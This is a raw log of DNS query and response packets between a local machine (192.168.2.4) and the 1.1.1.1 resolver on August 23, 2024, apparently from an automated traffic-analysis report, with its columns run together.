                                                                                                                                                                                                              Aug 23, 2024 18:47:51.414474964 CEST53616811.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.414484978 CEST5172253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.414485931 CEST53544801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.414680958 CEST5342753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.416266918 CEST53547791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.419214010 CEST53533151.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.427866936 CEST53601761.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.429327011 CEST53581031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430444956 CEST53534211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430454969 CEST53552731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430464029 CEST53655131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430537939 CEST53510341.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430548906 CEST53526891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.430557966 CEST53543771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.431432962 CEST53528101.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.431546926 CEST53536361.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.431564093 CEST53633631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.433495998 CEST53534271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.433680058 CEST53573251.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.436259031 CEST53509951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.441755056 CEST53610821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.443815947 CEST53603751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.445029020 CEST53565751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.453041077 CEST53577731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.454531908 CEST53593611.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.454894066 CEST53609481.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.457484961 CEST53648861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.458055019 CEST53517221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.545270920 CEST53598281.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.551512957 CEST53509191.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.567964077 CEST53650631.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.570564032 CEST53519861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.594535112 CEST53577891.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.594923019 CEST53545941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:51.616799116 CEST53506621.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.012447119 CEST53652031.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:52.356703043 CEST5252253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.336301088 CEST53525221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:47:53.338781118 CEST53525221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.532422066 CEST6100953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533051968 CEST6268553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533533096 CEST6104853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.533934116 CEST6518353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534445047 CEST5282153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534647942 CEST5706653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.534981012 CEST6455453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.535273075 CEST6315853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.535805941 CEST6405053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.536309004 CEST6525653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.536780119 CEST5106653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.537252903 CEST6170053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.537744045 CEST5406053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538258076 CEST4950753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538535118 CEST6362953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.538619995 CEST5694353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539277077 CEST6338853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539380074 CEST4961653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539788008 CEST5650653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.539908886 CEST6215653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.540429115 CEST6428853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.540445089 CEST6394153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541172981 CEST4984453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541276932 CEST5681253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541687012 CEST4932953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541906118 CEST5637753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.541966915 CEST5492353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.542490959 CEST5544753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.542979956 CEST6169753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.543459892 CEST6526953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.543915033 CEST5743053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.544610977 CEST6134753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545221090 CEST5656853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545670986 CEST5379553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.545670986 CEST6031453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546268940 CEST5762753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546375036 CEST5696053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.546998024 CEST5908653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547115088 CEST6282853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547662973 CEST5533853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.547696114 CEST6161353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.548439026 CEST5464753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.548501968 CEST5489953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549005032 CEST6330953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549027920 CEST5289253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.549457073 CEST5695153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550235987 CEST6411753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550261974 CEST5776953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550414085 CEST5052653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.550757885 CEST5189853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551069021 CEST6424453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551326036 CEST5759553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551631927 CEST5062353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.551915884 CEST5053253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552206039 CEST5184653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552534103 CEST6268053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.552707911 CEST5908053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553390980 CEST5821353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553432941 CEST6267953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553545952 CEST5424053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553580999 CEST6338253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553741932 CEST5677753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553778887 CEST6017353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.553950071 CEST6114553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.566001892 CEST53610481.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.566499949 CEST53626851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.566510916 CEST53528211.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.567435980 CEST53631581.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.567449093 CEST53651831.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.567459106 CEST53570661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.570135117 CEST53610091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.570143938 CEST53640501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.570148945 CEST53645541.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.575299025 CEST53565061.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.576596975 CEST53493291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.576606989 CEST53569431.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.579988003 CEST53613471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.579998970 CEST53568121.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580007076 CEST53621561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580017090 CEST53563771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580028057 CEST53642881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580038071 CEST53505261.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580053091 CEST53617001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.580061913 CEST53548991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.581974983 CEST53590861.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.581990004 CEST53495071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.581998110 CEST53498441.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.582007885 CEST53616971.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.582016945 CEST53510661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.582031012 CEST53569601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.582041979 CEST53496161.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585547924 CEST53537951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585558891 CEST53603141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585566998 CEST53553381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585577011 CEST53633881.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585587025 CEST53506231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585597038 CEST53574301.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585606098 CEST53518461.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585614920 CEST53577691.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585623980 CEST53626801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585634947 CEST53518981.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585644960 CEST53505321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.585654974 CEST53626791.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.587439060 CEST53590801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.587449074 CEST53633821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.587456942 CEST53567771.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.594266891 CEST53611451.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.605444908 CEST53554471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607804060 CEST53549231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607814074 CEST53546471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607821941 CEST53639411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607831955 CEST53569511.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607841015 CEST53636291.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607851028 CEST53633091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607858896 CEST53642441.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.607868910 CEST53575951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.609394073 CEST53542401.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.609404087 CEST53616131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.609411001 CEST53652561.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.612293005 CEST53601731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.612303019 CEST53628281.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.612310886 CEST53528921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.614573956 CEST53565681.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.730348110 CEST53641171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.734112978 CEST53652691.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.734123945 CEST53582131.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.781593084 CEST53576271.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:23.915221930 CEST53540601.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.646929979 CEST5124453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.647690058 CEST5088253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.647738934 CEST4977453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648318052 CEST5893353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648344994 CEST5045153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.648857117 CEST5388553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649350882 CEST5021653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649350882 CEST4957353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649388075 CEST5809653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.649848938 CEST6233753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650068998 CEST6042853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650135040 CEST5871553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650614023 CEST5103653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650877953 CEST6274553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.650877953 CEST6188453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651424885 CEST5629153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651453018 CEST5909253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651912928 CEST5216453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.651912928 CEST5202453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652369976 CEST5470053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652385950 CEST5482253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.652862072 CEST6237153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653084040 CEST5178453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653115034 CEST6252253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653743029 CEST5374753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.653798103 CEST6010753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654268980 CEST5597353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654524088 CEST5992053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.654540062 CEST5628053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655134916 CEST5265953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655210018 CEST6017553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655596972 CEST6154153192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.655936003 CEST5996553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.657912970 CEST5143853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658529997 CEST53589331.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658724070 CEST5843553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658806086 CEST5999953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.658924103 CEST5599553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659145117 CEST6482053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659216881 CEST5151753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659421921 CEST5611753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659533978 CEST5803953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659636974 CEST6095053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659724951 CEST5263653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659838915 CEST6498353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.659904957 CEST5166653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660031080 CEST5338053192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660099983 CEST6113253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660209894 CEST5810253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660306931 CEST5282353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660381079 CEST6170953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660496950 CEST6046253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660548925 CEST5172353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660708904 CEST53495731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660722971 CEST5439453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660747051 CEST5183553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660923004 CEST6141453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.660960913 CEST6340953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661130905 CEST5710453192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661317110 CEST6544653192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661343098 CEST5427253192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661494017 CEST5243953192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661560059 CEST5575853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661572933 CEST53580961.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661711931 CEST5311553192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661750078 CEST5420853192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.661906958 CEST5471353192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.664479017 CEST53526591.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.665087938 CEST53510361.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.665147066 CEST53537471.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668163061 CEST53521641.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668174982 CEST53601071.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668184996 CEST53517841.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668195009 CEST53627451.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668205023 CEST53562911.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668216944 CEST53559731.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668226004 CEST53548221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668237925 CEST53599651.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.668247938 CEST53562801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.671494007 CEST53615411.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.671506882 CEST53625221.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.671514988 CEST53599991.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.671519995 CEST53584351.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.671809912 CEST53526361.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674671888 CEST53533801.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674681902 CEST53515171.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674690962 CEST53571041.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674700975 CEST53611321.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674710035 CEST53528231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674720049 CEST53649831.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674730062 CEST53648201.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674738884 CEST53542721.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674748898 CEST53517231.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674757957 CEST53581021.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674767971 CEST53609501.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674778938 CEST53518351.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674787998 CEST53524391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674798012 CEST53614141.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674802065 CEST53634091.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674806118 CEST53543941.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.674814939 CEST53516661.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.679560900 CEST53504511.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.679907084 CEST53512441.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.685398102 CEST53590921.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.686088085 CEST53538851.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688172102 CEST53604281.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688184023 CEST53587151.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688193083 CEST53547001.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688203096 CEST53623371.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688213110 CEST53601751.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.688222885 CEST53508821.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.690166950 CEST53514381.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.692697048 CEST53559951.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.692831993 CEST53580391.1.1.1192.168.2.4
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.694346905 CEST6198753192.168.2.41.1.1.1
                                                                                                                                                                                                              Aug 23, 2024 18:48:35.696636915 CEST53561171.1.1.1192.168.2.4
